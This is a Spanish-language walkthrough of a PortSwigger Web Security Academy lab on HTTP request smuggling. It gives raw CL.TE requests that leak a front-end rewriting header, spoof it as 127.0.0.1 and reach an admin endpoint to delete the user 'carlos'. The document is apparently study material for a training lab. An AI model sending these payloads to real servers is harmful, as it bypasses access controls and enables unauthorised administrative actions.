08 - Exploiting HTTP request smuggling to reveal front-end request rewriting

El frontend no soporte chunked.

Si tiramos esto, nos sigue poniendo que : Admin interface only available if logged in as an administrator, or if requested from 127.0.0.1

POST / HTTP/1.1\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net\r\n
Content-Length: 144\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST /admin HTTP/1.1\r\n
Host: localhost\r\n
X-Forwarded-For: localhost\r\n
Content-Length: 6\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
X=

POST / HTTP/1.1\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net\r\n
Content-Length: 144\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST /admin HTTP/1.1\r\n
Host: 127.0.0.1\r\n
X-Forwarded-For: 127.0.0.1\r\n
Content-Length: 6\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
X=\r\n

Como no funciona esa cabecera, la idea aquí va a ser likear la cabecera que añade el frontend para enviarla al backend, una petición parecido a X-Forwarded-For que también sirve para spoofear la IP.

Aprovechamos la funcionalidad de search, le metemos un segundo Content-Length de 120, para que así nos likee en el resultado de la búsqueda las cabeceras que añade el frontend :

POST / HTTP/1.1\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net\r\n
Content-Length: 122\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST / HTTP/1.1\r\n
Host: localhost\r\n
Content-Length: 120\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
search=test

La petición que realmente llega al enviar la normal sería esta :

POST / HTTP/1.1\r\n
Host: localhost\r\n
Content-Length: 120\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
search=testPOST / HTTP/1.1\r\n
X-joelfo-Ip: 90.77.219.74\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net

Para resolver el lab :

POST / HTTP/1.1\r\n
Host: 0abc005404f6398281d57fbf00c400f5.web-security-academy.net\r\n
Content-Length: 122\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
POST /admin/delete?username=carlos HTTP/1.1\r\n
Host: localhost\r\n
X-joelfo-Ip: 127.0.0.1\r\n
Content-Length: 6\r\n
Content-Type: application/x-www-form-urlencoded\r\n
\r\n
X=